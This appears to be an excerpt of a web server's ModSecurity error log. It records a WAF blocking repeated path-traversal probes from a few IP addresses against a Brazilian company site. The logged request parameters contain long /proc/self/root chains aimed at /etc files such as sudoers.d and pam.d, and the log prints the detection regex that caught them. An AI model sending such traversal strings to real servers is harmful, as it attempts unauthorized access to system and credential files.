"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGGBePVOt35XCGZP8txQAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:16:40.699986 2026] [:error] [pid 11469:tid 140411674785536] [client 74.7.243.203:36468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGKJDEJR9VXonE_-1M9wAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:16:42.047443 2026] [:error] [pid 2325:tid 140411666392832] [client 74.7.243.203:59678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGKu82sZHvlq4xgHrAvQAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:16:45.715298 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.243.203:59694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGLKBJNF7axNlVR0X62gAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:17:28.139436 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.243.203:59706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGWO82sZHvlq4xgHrA7AAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:17:33.958504 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:42484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGXaBJNF7axNlVR0X7BQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:17:36.486112 2026] [:error] [pid 1210:tid 140411741927168] [client 74.7.243.203:42054] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGYFKJy4A1bGlmj9BTbAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:17:42.162334 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:42070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGZpqmL8PQht4WJFlF9wAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:17:52.451250 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.241.46:50760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGcJqmL8PQht4WJFlGAQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:17:57.211505 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.46:36034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGdQeiSKl8TjouI-YA2AAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:18:02.475645 2026] [:error] [pid 1961:tid 140411683178240] [client 74.7.241.46:53588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGenRXaaWotPICgYsjrgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:18:05.185662 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:53600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGfdCmCSWTlPouqorJegAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:18:13.163412 2026] [:error] [pid 2305:tid 140411691570944] [client 74.7.241.46:53612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGhAQohV2v-7oj5HH5aAAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:18:16.672263 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.244.31:56484] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablGh6BJNF7axNlVR0X7FAAAABQ"]
[Tue Mar 17 09:18:48.547553 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.241.46:34810] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGqNCmCSWTlPouqorJuQAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:18:51.863904 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.228.16:45416] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablGq6BJNF7axNlVR0X7MwAAAAc"]
[Tue Mar 17 09:19:13.020397 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.241.46:57984] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGwXRXaaWotPICgYsj6gAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:14.382786 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.241.46:60734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGwtCmCSWTlPouqorJzwAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:16.732649 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.241.46:60742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGxO82sZHvlq4xgHrBMgAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:19.360692 2026] [:error] [pid 7000:tid 140411699963648] [client 74.7.241.46:40464] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGxxePVOt35XCGZP8uHwAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:21.827494 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.241.46:40474] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGye82sZHvlq4xgHrBOAAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:23.145545 2026] [:error] [pid 1210:tid 140411590858496] [client 74.7.241.46:40478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGy1KJy4A1bGlmj9BTygAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:24.387105 2026] [:error] [pid 11469:tid 140411607643904] [client 74.7.241.46:40484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGzJDEJR9VXonE_-1NmwAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
